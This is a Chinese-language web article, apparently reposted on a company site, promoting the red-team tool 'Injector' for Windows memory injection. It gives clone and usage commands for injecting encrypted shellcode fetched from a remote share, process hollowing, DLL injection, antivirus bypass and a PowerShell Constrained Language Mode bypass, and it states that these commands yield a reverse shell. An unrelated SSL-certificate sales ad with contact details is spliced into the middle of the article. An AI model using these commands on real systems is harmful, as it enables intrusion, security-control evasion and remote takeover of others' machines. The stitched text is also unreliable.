Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。
芜湖县ssl适用于网站、小程序/APP、API接口等需要进行数据传输应用场景,ssl证书未来市场广阔!成为创新互联公司的ssl证书销售渠道,可以享受市场价格4-6折优惠!如果有意向欢迎电话联系或者加微信:18980820575(备注:SSL证书合作)期待与您的合作!
针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件,该工具将帮助我们完成后续的所有事情。默认情况下,工具会将Shellcode注入至exe,如果没有找到目标进程,它将会创建一个记事本进程,并注入其中实现持久化感染。
广大研究人员可以使用下列命令将该项目源码克隆至本地:
- git clone https://github.com/0xDivyanshu/Injector.git
- C:\Users\admin>Injector.exe
- Help Options for Xenon:
- -m Mode of operation
- -m 1 Specifies the mode as Process injection
- -m 2 Specifies the mode as Reflective DLL Injection
- -m 3 Specifies the mode as Process Hollowing
- -m 4 No injection! Give me my damn shell
- -m 5 Powershell session via CLM bypass
- -m 6 DLL hollowing
- -TempFile File location that your current user can read
- -shellcode Use shellcode
- -dll Use dll
- -decrypt-xor Specify Xor decryption for shellcode
- -pass Specifty the password for Xor decryption
- -decrypt-aes Specify aes decryption for shellcode
- -pass Specifty the password for aes decryption
- -location Specify the location i.e either server or local
- -bypass Uses enhance attempts to bypass AV
如需生成加密的Shellcode,请在Kali下使用Helper.exe。
- Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass
上述命令将解密你的Shellcode并给你一个反向Shell。
如果你不想使用加密的Shellcode,你也可以直接使用下列命令运行下列命令:
- Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt"
将其中的“-m=1”修改为“2,3,4,6”之后,就可以运行其他模式了:
- Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt
上述命令将提供要给会话,我们可以使用它来执行IEX cradle,并获取一个能够绕过CLM的反向Shell。
你还可以使用Invoke-Exe.ps1来通过PowerShel执行Injector:
- Invoke-Exe -loc C:\Users\john\injector.exe
Injector:【GitHub传送门】
当前文章:如何使用Injector实现Windows下的内存注入
URL链接:http://www.shufengxianlan.com/qtweb/news32/41882.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联